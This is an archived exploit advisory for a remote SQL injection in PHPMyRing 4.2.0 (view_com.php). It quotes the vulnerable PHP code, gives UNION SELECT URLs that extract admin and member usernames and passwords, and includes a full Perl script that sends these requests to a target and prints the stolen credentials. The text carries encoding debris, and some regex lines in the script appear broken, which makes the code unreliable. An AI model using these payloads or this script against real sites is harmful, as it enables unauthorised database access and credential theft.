TUCoPS :: Web :: PHP :: b06-4144.htm

PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection
PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection
PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection


#######################################################################=0D
# =0D
# PHPMyRing's (view_com.php) Remote SQL injection Exploit=0D
# =0D
# vulnerable code on view_com.php line ( 14 - 24)=0D
# =0D
# [code]=0D
# -----------------------------------------------------------------------------------=0D
# if (!$idsite)=0D
#    {=0D
#    echo "
"._("Erreur! Le n° du site n'est pas défini!")."
";=0D
#    }=0D
# else=0D
#     {=0D
#     // On va aller chercher le nom du site consern=E9, =E7a sera fait ;)=0D
#     // Connexion MySQL=0D
#     $conn=connecte();=0D
#     $row=mysql_fetch_array(requete("SELECT site_nom FROM webring WHERE idsite=$idsite"));  # <== SQL injection=0D
#     $site_nom=$row['site_nom'];=0D
#     =0D
# ...............=0D
# =0D
# =0D
# xmlns="http://www.w3.org/1999/xhtml" xml:lang="">=0D 
# =0D
# <? echo _("Commentaires du site"). " ".$site_nom; ?>    =0D
# ---------------------------------------------------------------------------------[/code]=0D
# =0D
# $idsite is not proprelly verified and can be used to inject sql some query=0D
# =0D
#============0D
# Exploit  :=0D
#============0D
# =0D
# http://localhost/webring/view_com.php?idsite=[SQL]=0D 
# =0D
#============0D
# Exemples : =0D
#============0D
# =0D
# [+] the first PoC URL will display admin username in page title and the second admin password=0D
# =0D
# http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm=0D 
# =0D
# http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm=0D 
# =0D
# =0D
# [+] this will display members username (1) and password(2) in page title=0D
# =0D
# 1) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20pseudo%20FROM%20webring%20WHERE%20idsite=[victimesiteid]=0D 
# =0D
# 2) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20mdp%20FROM%20webring%20WHERE%20idsite=[victimesiteid]=0D 
# =0D
# Exploit to extract both admin login and plain text password:=0D
#=0D
# C:\>perl ring.pl 127.0.0.1 webring=0D
# #################################################=0D
# #   PHPMyRing's Remote SQL injection Exploit    #=0D
# #   Discovered by simo64_at_morx_org            #=0D
# #   Script writting by simo_at_morx_org         #=0D
# #         MorX Security Research Team           #=0D
# # www.morx.org #=0D 
# #################################################=0D
=0D
# [*] Trying to get the admin login ...=0D
=0D
# [+] your admin login is --> admin=0D
=0D
# [+] your admin pass is --> 123456=0D
 =0D
use IO::Socket;=0D
=0D
if(!defined($ARGV[0] && $ARGV[1])) {=0D
=0D
system (clear);=0D
print "\n";=0D
print "#################################################\n";=0D
print "#   PHPMyRing's Remote SQL injection Exploit    #\n";=0D
print "#   Discovered by simo64_at_morx_org            #\n";=0D
print "#   Script writting by simo_at_morx_org         #\n";=0D
print "#         MorX Security Research Team           #\n";=0D
print "# www.morx.org #\n";=0D 
print "#################################################\n\n";=0D
=0D
print "--- Usage:   perl $0  \n";=0D
print "--- Example: perl $0 127.0.0.1 afd_webring\n\n";=0D
exit; }=0D
=0D
$TARGET            = $ARGV[0];=0D
=0D
$FOLDER            = $ARGV[1];=0D
=0D
$PORT              = "80";=0D
=0D
$SCRIPT            = "/view_com.php?idsite=";=0D
=0D
$SQLPASS           = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm";=0D
=0D
$SQLADMIN          = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm";=0D
=0D
################################################################################=0D
=0D
$COMMAND1         = "GET /$FOLDER$SCRIPT$SQLADMIN HTTP/1.1";=0D
$COMMAND2         = "Host: $TARGET";=0D
$COMMAND3         = "Connection: Close";=0D
$COMMAND4         = "GET /$FOLDER$SCRIPT$SQLPASS HTTP/1.1";=0D
=0D
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")=0D
|| die "Can't connect to $TARGET";=0D
=0D
print "#################################################\n";=0D
print "#   PHPMyRing's Remote SQL injection Exploit    #\n";=0D
print "#   Discovered by simo64_at_morx_org            #\n";=0D
print "#   Script writting by simo_at_morx_org         #\n";=0D
print "#         MorX Security Research Team           #\n";=0D
print "# www.morx.org #\n";=0D 
print "#################################################\n\n";=0D
=0D
sleep 2;=0D
=0D
print "[*] Trying to get the admin login ...\n\n";=0D
=0D
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";=0D
=0D
while ($result = <$remote> ) {=0D
=0D
if ($result =~ /site (.*?) $adminlogin\n\n";=0D
$a = 1;=0D
}=0D
}=0D
=0D
if ($a == 0) =0D
{ =0D
print "[-] Failed, cant get the admin login\n\n";=0D
print "[*] Trying to get the admin password ...\n\n";=0D
}=0D
=0D
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT")=0D
|| die "Can't connect to $TARGET";=0D
=0D
print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n";=0D
=0D
while ($result2 = <$remote> ) {=0D
=0D
if ($result2 =~ /site (.*?) $adminpass\n\n";=0D
$b = 1;=0D
}=0D
}=0D
=0D
if ($b == 0)=0D
{ print "[-] Failed, cant get the admin password\n";=0D
}=0D
=0D
$remote->flush();=0D
close($remote);=0D
exit;

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH